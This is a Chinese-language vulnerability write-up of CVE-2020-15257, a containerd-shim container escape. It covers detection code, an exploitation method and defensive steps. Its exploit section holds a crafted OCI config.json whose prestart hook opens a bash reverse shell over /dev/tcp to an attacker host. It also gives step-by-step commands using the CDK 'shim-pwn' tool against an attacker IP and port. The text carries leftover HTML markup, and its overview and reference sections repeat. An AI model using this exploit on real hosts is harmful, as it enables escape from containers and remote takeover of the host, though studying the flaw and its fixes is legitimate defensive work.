CVE-2020-15257 容器逃逸漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2020-15257 是一个影响 containerd 的容器逃逸漏洞，当 Docker 使用 `--net=host<\/code> 参数启动容器时，攻击者可以利用该漏洞从容器内部逃逸到宿主机。<\/p>`

漏洞原理<\/h2>
漏洞存在于 containerd -> containerd-shim -> runc 的通信模型中：<\/p>

containerd-shim 的接口作为 abstract unix socket 暴露<\/li>
当 Docker 使用 net=host<\/code> 参数启动容器时（与宿主机共享 net namespace）<\/li>
容器内部可以访问到这些 unix socket<\/li>
攻击者通过这些 socket 可以控制下游 runc 进程启动新的恶意镜像<\/li>
<\/ol>
漏洞检测<\/h2>
检测方法是通过检查容器内的 \/proc\/net\/unix<\/code> 文件，查找 containerd-shim 的 socket：<\/p>
func<\/span> getShimSockets<\/span>() ([][]byte<\/span>, error<\/span>) {
<\/span><\/span>    re<\/span>, err<\/span> :=<\/span> regexp<\/span>.Compile<\/span>("@\/containerd-shim\/.*\\.sock"<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    data<\/span>, err<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("\/proc\/net\/unix"<\/span>)
<\/span><\/span>    matches<\/span> :=<\/span> re<\/span>.FindAll<\/span>(data<\/span>, -<\/span>1<\/span>)
<\/span><\/span>    if<\/span> matches<\/span> ==<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, errors<\/span>.New<\/span>("Cannot find vulnerable socket"<\/span>)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> matches<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
已有利用思路<\/h3>

通过启动新镜像 mount 宿主机文件系统<\/li>
写入宿主机文件如 \/etc\/crontab<\/code> 完成逃逸<\/li>
<\/ol>
更高效的利用方法<\/h3>
不启动完整容器，而是利用 containerd-shim 的 prestart hook 直接执行命令：<\/p>

构造包含恶意 prestart hook 的 config.json<\/li>
通过 ttrpc 协议与 containerd-shim 通信<\/li>
利用 CreateTask API 触发 prestart hook 执行<\/li>
<\/ol>
关键利用代码：<\/p>
var<\/span> configJson<\/span> = `
<\/span><\/span><\/span>{
<\/span><\/span><\/span>  "ociVersion": "1.0.1-dev",
<\/span><\/span><\/span>  "process": {
<\/span><\/span><\/span>    "terminal": true,
<\/span><\/span><\/span>    "user": {
<\/span><\/span><\/span>      "uid": 0,
<\/span><\/span><\/span>      "gid": 0
<\/span><\/span><\/span>    },
<\/span><\/span><\/span>    "args": [
<\/span><\/span><\/span>      "\/bin\/bash"
<\/span><\/span><\/span>    ],
<\/span><\/span><\/span>    "env": [
<\/span><\/span><\/span>      "PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin",
<\/span><\/span><\/span>      "HOSTNAME=b6cee9b57f3b",
<\/span><\/span><\/span>      "TERM=xterm"
<\/span><\/span><\/span>    ],
<\/span><\/span><\/span>    "cwd": "\/"
<\/span><\/span><\/span>  },
<\/span><\/span><\/span>  "root": {
<\/span><\/span><\/span>   "path": "\/tmp"
<\/span><\/span><\/span>  },
<\/span><\/span><\/span>  "hostname": "b6cee9b57f3b",
<\/span><\/span><\/span>  "hooks": {
<\/span><\/span><\/span>        "prestart": [
<\/span><\/span><\/span>            {
<\/span><\/span><\/span>                "path": "\/bin\/bash",
<\/span><\/span><\/span>                "args": ["bash", "-c", "bash -i >& \/dev\/tcp\/$RHOST$\/$RPORT$ 0>&1"],
<\/span><\/span><\/span>                "env":  ["PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin"]
<\/span><\/span><\/span>            }
<\/span><\/span><\/span>        ]
<\/span><\/span><\/span>    },
<\/span><\/span><\/span>  "linux": {
<\/span><\/span><\/span>    "resources": {
<\/span><\/span><\/span>      "devices": [
<\/span><\/span><\/span>        {
<\/span><\/span><\/span>          "allow": false,
<\/span><\/span><\/span>          "access": "rwm"
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>      ],
<\/span><\/span><\/span>      "memory": {
<\/span><\/span><\/span>        "disableOOMKiller": false
<\/span><\/span><\/span>      },
<\/span><\/span><\/span>      "cpu": {
<\/span><\/span><\/span>        "shares": 0
<\/span><\/span><\/span>      },
<\/span><\/span><\/span>      "blockIO": {
<\/span><\/span><\/span>        "weight": 0
<\/span><\/span><\/span>      }
<\/span><\/span><\/span>    },
<\/span><\/span><\/span>    "namespaces": [
<\/span><\/span><\/span>      {
<\/span><\/span><\/span>        "type": "mount"
<\/span><\/span><\/span>      },
<\/span><\/span><\/span>      {
<\/span><\/span><\/span>        "type": "network"
<\/span><\/span><\/span>      },
<\/span><\/span><\/span>      {
<\/span><\/span><\/span>        "type": "uts"
<\/span><\/span><\/span>      },
<\/span><\/span><\/span>      {
<\/span><\/span><\/span>        "type": "ipc"
<\/span><\/span><\/span>      }
<\/span><\/span><\/span>    ]
<\/span><\/span><\/span>  }
<\/span><\/span><\/span>}
<\/span><\/span><\/span>`<\/span>
<\/span><\/span><\/code><\/pre>完整利用步骤<\/h3>


在宿主机上启动一个普通容器：<\/p>
docker run -d -it ubuntu \/bin\/bash
<\/span><\/span><\/code><\/pre><\/li>

启动一个使用 host 网络的容器（漏洞利用环境）：<\/p>
docker run --rm --net=<\/span>host -it ubuntu \/bin\/bash
<\/span><\/span><\/code><\/pre><\/li>

在容器内执行利用代码：<\/p>
.\/cdk_linux_amd64 run shim-pwn <攻击者IP> <监听端口>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
防御措施<\/h2>

避免使用 --net=host<\/code> 参数启动容器<\/li>
升级 containerd 到修复版本<\/li>
使用 seccomp 和 AppArmor 限制容器权限<\/li>
<\/ol>
参考资源<\/h2>

漏洞原理解析 - Medium<\/a><\/li>
中文分析文章<\/a><\/li>
NCC Group 利用分析<\/a><\/li>
完整利用代码<\/a><\/li>
<\/ol>

CVE-2020-15257 容器逃逸漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2020-15257 是一个影响 containerd 的容器逃逸漏洞，当 Docker 使用 --net=host<\/code> 参数启动容器时，攻击者可以利用该漏洞从容器内部逃逸到宿主机。<\/p>

漏洞利用<\/h2>

参考资源<\/h2> 漏洞原理解析 - Medium<\/a><\/li> 中文分析文章<\/a><\/li> NCC Group 利用分析<\/a><\/li> 完整利用代码<\/a><\/li> <\/ol>

漏洞概述<\/h2>
CVE-2020-15257 是一个影响 containerd 的容器逃逸漏洞，当 Docker 使用 `--net=host<\/code> 参数启动容器时，攻击者可以利用该漏洞从容器内部逃逸到宿主机。<\/p>`

参考资源<\/h2>

漏洞原理解析 - Medium<\/a><\/li>
中文分析文章<\/a><\/li>
NCC Group 利用分析<\/a><\/li>
完整利用代码<\/a><\/li> <\/ol>